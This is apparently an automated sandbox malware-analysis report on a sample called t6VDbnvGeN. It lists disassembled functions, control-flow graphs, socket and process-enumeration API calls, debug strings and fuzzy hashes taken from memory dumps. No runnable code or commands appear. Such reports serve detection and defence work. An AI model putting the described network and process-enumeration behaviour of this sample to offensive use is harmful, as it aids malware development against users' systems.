                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 53de970151c99c9bad65999742a364b790d6f985b90d809193fc34c5d2cbee5d
                                                              • Instruction ID: b55c7c07da1788ef96bf7adbe6595d394621f9fc589cf5d4da6bbfad3ed1950b
                                                              • Opcode Fuzzy Hash: 53de970151c99c9bad65999742a364b790d6f985b90d809193fc34c5d2cbee5d
                                                              • Instruction Fuzzy Hash: E851E371A00349ABDB14DF24C885FBAB7A5FF84314F148529FE489B382E735E991CB91
                                                              Function 007C7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1675 7c7770-7c778e 1676 7c77b6-7c77c2 recv 1675->1676 1677 7c7790-7c7797 1675->1677 1679 7c782e-7c7832 1676->1679 1680 7c77c4-7c77d9 call 7c72a0 1676->1680 1677->1676 1678 7c7799-7c77a1 1677->1678 1681 7c77db-7c7829 call 7c72a0 call 7ccb20 call b48c50 1678->1681 1682 7c77a3-7c77b4 1678->1682 1680->1679 1681->1679 1682->1680
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 258341b3bfb8b5ecac71d8e70b7e22d53a5deb813f5d2ce695fdef2fa20f80c9
                                                              • Instruction ID: 747d530f5dda502f6ebc6f10a3230c9e9dffcde50bd48c318de926013b45d3ab
                                                              • Opcode Fuzzy Hash: 258341b3bfb8b5ecac71d8e70b7e22d53a5deb813f5d2ce695fdef2fa20f80c9
                                                              • Instruction Fuzzy Hash: E61127B560A3187FD110AB119C4AF27BB9DDBC6B68F04091CBC0823342DA659D05CAF2
                                                              Function 007C75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1694 7c75e0-7c75ed 1695 7c75ef-7c75f6 1694->1695 1696 7c7607-7c7629 socket 1694->1696 1695->1696 1697 7c75f8-7c75ff 1695->1697 1698 7c763f-7c7642 1696->1698 1699 7c762b-7c763c call 7c72a0 1696->1699 1700 7c7601-7c7602 1697->1700 1701 7c7643-7c7699 call 7c72a0 call 7ccb20 call b48c50 1697->1701 1699->1698 1700->1696
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 5c3cb12295f4a24b4910ab21e528153c53f003cf7b740b1d4599fb167367de02
                                                              • Instruction ID: e1322304fc1192c810e1388e760372b778b5f6b5353086720df3270e3f9a5392
                                                              • Opcode Fuzzy Hash: 5c3cb12295f4a24b4910ab21e528153c53f003cf7b740b1d4599fb167367de02
                                                              • Instruction Fuzzy Hash: 6C11AB72A052113BDA10AB29AC5AF5B7F99DFC2734F04091CF804B22E2DA158C59C6F1
                                                              Function 007FA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1803 7fa150-7fa159 1804 7fa15f-7fa17b 1803->1804 1805 7fa250 1803->1805 1806 7fa249-7fa24f 1804->1806 1807 7fa181-7fa1ce getsockname 1804->1807 1806->1805 1808 7fa1f7-7fa214 call 7fef30 1807->1808 1809 7fa1d0-7fa1f5 call 7dd090 1807->1809 1808->1806 1814 7fa216-7fa23b call 7dd090 1808->1814 1816 7fa240-7fa246 call 804f40 1809->1816 1814->1816 1816->1806
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 007FA1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 007FA23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 007FA1F0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: 9c4d2744e9942caa581ae3792c22e6354e4623e0a95e83c8760bea24b98dc508
                                                              • Instruction ID: a112b8c113f42ade33dcb8149dbc7dd85b1eaff01b73f04448262a9fddd761ff
                                                              • Opcode Fuzzy Hash: 9c4d2744e9942caa581ae3792c22e6354e4623e0a95e83c8760bea24b98dc508
                                                              • Instruction Fuzzy Hash: C921F871948284BAE7219B18DC46FF773BCEFD1324F040614FA9853152FF32598A86E2
                                                              Function 007DD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1823 7dd5e0-7dd5ee 1824 7dd5f0-7dd604 call 7dd690 1823->1824 1825 7dd652-7dd662 WSAStartup 1823->1825 1831 7dd61b-7dd651 call 7e7620 1824->1831 1832 7dd606-7dd614 1824->1832 1826 7dd664-7dd66f 1825->1826 1827 7dd670-7dd676 1825->1827 1827->1824 1829 7dd67c-7dd68d 1827->1829 1832->1831 1837 7dd616 1832->1837 1837->1831
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 007DD65A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: f7f1de9ae7232a8d87c1f4147d98f253a450b86bbdcbbbd4a4725855fa79fa09
                                                              • Instruction ID: 34b6ad77e12aa8be8bbcde8d1996c046f7a54021e41a0a50014da0b63796d531
                                                              • Opcode Fuzzy Hash: f7f1de9ae7232a8d87c1f4147d98f253a450b86bbdcbbbd4a4725855fa79fa09
                                                              • Instruction Fuzzy Hash: 850144D09443415AF72177385C1B77535A55B91344F440869D848D63D2FB6DCD5DC1E3
                                                              Function 0088AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1839 88aa30-88aa64 1841 88aa6a-88aaa7 call 87e730 1839->1841 1842 88ab04-88ab09 1839->1842 1846 88aaa9-88aabd 1841->1846 1847 88ab0e-88ab13 1841->1847 1844 88ae80-88ae89 1842->1844 1848 88ab18-88ab50 1846->1848 1849 88aabf-88aac7 1846->1849 1850 88ae2e 1847->1850 1855 88ab58-88ab6d 1848->1855 1849->1850 1852 88aacd-88ab02 1849->1852 1851 88ae30-88ae4a call 87ea60 call 87ebf0 1850->1851 1864 88ae4c-88ae57 1851->1864 1865 88ae75-88ae7d 1851->1865 1852->1855 1858 88ab6f-88ab73 1855->1858 1859 88ab96-88abab socket 1855->1859 1858->1859 1861 88ab75-88ab8f 1858->1861 1859->1850 1863 88abb1-88abc5 1859->1863 1861->1863 1875 88ab91 1861->1875 1866 88abd0-88abed ioctlsocket 1863->1866 1867 88abc7-88abca 1863->1867 1869 88ae59-88ae5e 1864->1869 1870 88ae6e-88ae6f 1864->1870 1865->1844 1872 88abef-88ac0a 1866->1872 1873 88ac10-88ac14 1866->1873 1867->1866 1871 88ad2e-88ad39 1867->1871 1869->1870 1878 88ae60-88ae6c 1869->1878 1870->1865 1876 88ad3b-88ad4c 1871->1876 1877 88ad52-88ad56 1871->1877 1872->1873 1883 88ae29 1872->1883 1879 88ac16-88ac31 1873->1879 1880 88ac37-88ac41 1873->1880 1875->1850 1876->1877 1876->1883 1877->1883 1884 88ad5c-88ad6b 1877->1884 1878->1865 1879->1880 1879->1883 1881 88ac7a-88ac7e 1880->1881 1882 88ac43-88ac46 1880->1882 1889 88ac80-88ac9b 1881->1889 1890 88ace7-88ad03 1881->1890 1887 88ac4c-88ac51 1882->1887 1888 88ad04-88ad08 1882->1888 1883->1850 1892 88ad70-88ad78 1884->1892 1887->1888 1895 88ac57-88ac78 1887->1895 1888->1871 1894 88ad0a-88ad28 1888->1894 1889->1890 1896 88ac9d-88acc1 1889->1896 1890->1888 1897 88ad7a-88ad7f 1892->1897 1898 88ada0-88adae connect 1892->1898 1894->1871 1894->1883 1901 88acc6-88acd7 1895->1901 1896->1901 1897->1898 1902 88ad81-88ad99 1897->1902 1900 88adb3-88adcf 1898->1900 1908 88ae8a-88ae91 1900->1908 1909 88add5-88add8 1900->1909 1901->1883 1910 88acdd-88ace5 1901->1910 1902->1900 1908->1851 1911 88adda-88addf 1909->1911 1912 88ade1-88adf1 1909->1912 1910->1888 1910->1890 1911->1892 1911->1912 1913 88ae0d-88ae12 1912->1913 1914 88adf3-88ae07 1912->1914 1915 88ae1a-88ae1c call 88af70 1913->1915 1916 88ae14-88ae17 1913->1916 1914->1913 1919 88aea8-88aead 1914->1919 1920 88ae21-88ae23 1915->1920 1916->1915 1919->1851 1921 88ae93-88ae9d 1920->1921 1922 88ae25-88ae27 1920->1922 1923 88aeaf-88aeb1 call 87e760 1921->1923 1924 88ae9f-88aea6 call 87e7c0 1921->1924 1922->1851 1928 88aeb6-88aebe 1923->1928 1924->1928 1929 88af1a-88af1f 1928->1929 1930 88aec0-88aedb call 87e180 1928->1930 1929->1851 1930->1851 1933 88aee1-88aeec 1930->1933 1934 88aeee-88aeff 1933->1934 1935 88af02-88af06 1933->1935 1934->1935 1936 88af08-88af0b 1935->1936 1937 88af0e-88af15 1935->1937 1936->1937 1937->1844
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0088AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0088ABE3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: bf58a1ee1e82827a298edf38243db0d22c475b25e1371bf19ccf22548a19f304
                                                              • Instruction ID: 48d46442723e6dcd1d08aa4f587c04a7d14bbb8022f5ea4c4d1c5784fb9d5b28
                                                              • Opcode Fuzzy Hash: bf58a1ee1e82827a298edf38243db0d22c475b25e1371bf19ccf22548a19f304
                                                              • Instruction Fuzzy Hash: 1CE1B0706043029BEB28DF24C884B6B77A5FF89314F144A2EF998DB2D1E775D944CB92
                                                              Function 075B001B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 345COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: dffb74c325e1560185ac781d1a70617359ee9cedc63e578faf6230afdb0e0ab9
                                                              • Instruction ID: 77ffbdb326f169b4fb1930e5b8713733628659d831c3ac6f061659397125e5d3
                                                              • Opcode Fuzzy Hash: dffb74c325e1560185ac781d1a70617359ee9cedc63e578faf6230afdb0e0ab9
                                                              • Instruction Fuzzy Hash: 3961D6EB25C2217DB12285816F18EFB572EF6D3730B308826F80BD7682E2D54E4E5071
                                                              Function 075B0008 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 345COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aZXP
                                                              • API String ID: 0-3618135372
                                                              • Opcode ID: 3cb61c9e54f8b8cd1a00bac4da8a8725733dce085472a744b9ae65f520a954ba
                                                              • Instruction ID: efddaaf6f69982fa08f5715303f97debbc6cfa293bf8a120c006d0b8a6968f4e
                                                              • Opcode Fuzzy Hash: 3cb61c9e54f8b8cd1a00bac4da8a8725733dce085472a744b9ae65f520a954ba
                                                              • Instruction Fuzzy Hash: 3A61B6EB15C215BDB12285816F18EFB5B6EF6D3730B308826F80BD6682E2D94E4E5171
                                                              Function 075B0037 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 598e000e77d7017cca06a4c46cf1fd169b31a3f42dd5fe190dc7bd2a0881c8bc
                                                              • Instruction ID: 6251125c1cab7bcf765170d0bc5b25bb80ba2da2897a8610a6b8a0aabacfaee6
                                                              • Opcode Fuzzy Hash: 598e000e77d7017cca06a4c46cf1fd169b31a3f42dd5fe190dc7bd2a0881c8bc
                                                              • Instruction Fuzzy Hash: C061B3EB25C215BDB12285816F18EFB676EF6D3730B308826F80BD7682E2D54E4E5171
                                                              Function 075B0000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 342COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: ecfa45bb4dad15186a083565c9bcf9ce10c87b23ce479e63b2c627820d804675
                                                              • Instruction ID: 13b299f1625d96b11b035e1ffc78d30ed77c613866f6846cb4ca5c9bab03ad96
                                                              • Opcode Fuzzy Hash: ecfa45bb4dad15186a083565c9bcf9ce10c87b23ce479e63b2c627820d804675
                                                              • Instruction Fuzzy Hash: D861B6EB25C225BDB12285816F18EFB5B2EF5D3730B308826F80BD7682E2D54E4E5071
                                                              Function 075B0075 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: fc7e6e715bf0e19d8b0517f3bc10deea1e1933911bd2ba2d1cd8924024910366
                                                              • Instruction ID: 50ee8e5d6a10cf010447588acb0c098c091b8a34cafa0034eff1bd66687f21b6
                                                              • Opcode Fuzzy Hash: fc7e6e715bf0e19d8b0517f3bc10deea1e1933911bd2ba2d1cd8924024910366
                                                              • Instruction Fuzzy Hash: F051A2EB25C225BDB12285816F18EFB5B2EF5D3730B308826F80BD7682E2D54E4E5171
                                                              Function 075B0150 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aZXP
                                                              • API String ID: 0-3618135372
                                                              • Opcode ID: bc01f63196995ccdb4142acb789b32063ba63b5f27e88bdde35b14c84180a461
                                                              • Instruction ID: b72b3071e576a82727489b14467824925ec9627f8634748837a2c9a2b8028585
                                                              • Opcode Fuzzy Hash: bc01f63196995ccdb4142acb789b32063ba63b5f27e88bdde35b14c84180a461
                                                              • Instruction Fuzzy Hash: 6A5184EB25C2257D712285816F18EFB572EF5D7730B30C826F80BD6682E3D54A4E5071
                                                              Function 075B017B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 271COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aZXP
                                                              • API String ID: 0-3618135372
                                                              • Opcode ID: a2dd305e11c039d161218acbbc9bd53c0c0dbc9091a1a1a1265103de1708f578
                                                              • Instruction ID: 3c61fea14b4f716a5ef20ef18b8f5ea67aeb52783d0ccf46d6b8c65b8c774154
                                                              • Opcode Fuzzy Hash: a2dd305e11c039d161218acbbc9bd53c0c0dbc9091a1a1a1265103de1708f578
                                                              • Instruction Fuzzy Hash: 2E5182EB25C225BD712284416F68EFB572EF5D7730B31C826F80BD6682E3994A4E1171
                                                              Function 07560000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7b376d54ac8f816e6e948e81b934565e01b35e93fa45592be9e890460dfd612d
                                                              • Instruction ID: 88531203879b1fd851663f0d6be473e707dd7e096bf2f4784ed09fdf13863d1b
                                                              • Opcode Fuzzy Hash: 7b376d54ac8f816e6e948e81b934565e01b35e93fa45592be9e890460dfd612d
                                                              • Instruction Fuzzy Hash: 37519EEB26C125BD710290816F1CEFB6B2EF5C7730B318C26F80BD7282E2954E4A1171
                                                              Function 075B0104 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
